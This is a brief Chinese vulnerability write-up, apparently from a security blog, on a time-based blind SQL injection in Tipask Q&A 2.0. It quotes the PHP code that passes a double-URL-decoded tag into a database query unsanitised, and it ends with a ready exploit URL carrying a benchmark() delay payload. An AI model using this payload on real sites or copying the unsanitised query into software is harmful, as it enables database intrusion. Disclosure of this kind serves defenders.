tipask问答系统2.0SQL时间盲注漏洞

摘要

Author:Kavia文件
/model/question.php
[php]
function ontag() {$tag = urldecode($this->get['2']); //二次编码绕过

Author:Kavia

文件
/model/question.php
[php]
function ontag() {

$tag = urldecode($this->get['2']); //二次编码绕过

//echo $tag;

$encodeword = urlencode($tag);

$navtitle = $tag . '-标签搜索';

$qstatus = $status = intval($this->get[3]);

(!$status) && ($qstatus = "1,2,6");

$startindex = ($page - 1) * $pagesize;

$rownum = $this->db->fetch_total("question_tag", " tname='$tag' "); //带入查询[/php]

文件/lib/db.class.php

[php]function fetch_total($table,$where='1') {

return $this->result_first("SELECT COUNT(*) num FROM ".DB_TABLEPRE."$table WHERE $where"); //带入查询

}[/php]

exp：[php]
http://0day5.com/tipask/?question/tag/+urlencode("' and (select if(1=1,benchmark(500000,sha(1)),0))>0#");[/php]